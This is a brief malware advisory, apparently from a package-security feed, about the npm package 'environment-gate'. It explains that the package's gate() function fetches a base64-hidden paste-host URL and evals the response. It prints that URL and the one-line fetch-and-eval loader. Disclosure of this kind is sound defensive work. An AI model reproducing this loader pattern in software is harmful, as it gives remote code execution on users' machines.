Malicious code in environment-gate (npm)

__

Source: amazon-inspector (48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1)

The package's only export, gate(), performs an HTTP GET to a base64-obfuscated URL (https://www.jsonkeeper.com/b/VKUNI) and passes the response body directly to eval(). The destination is an anonymous, mutable JSON paste host whose contents the author can change at any moment, so any caller of the documented gate() API executes arbitrary remote JavaScript in the installer's Node.js process — full remote code execution. The base64 wrapping of the URL and the cover-story description ('utility to await multiple asynchronous calls') with no repo, empty author field, and a single-file payload are consistent with a throwaway malicious package. index.js line 2: require('axios').get(atob('...')).then(r => {eval(r.data.content)}).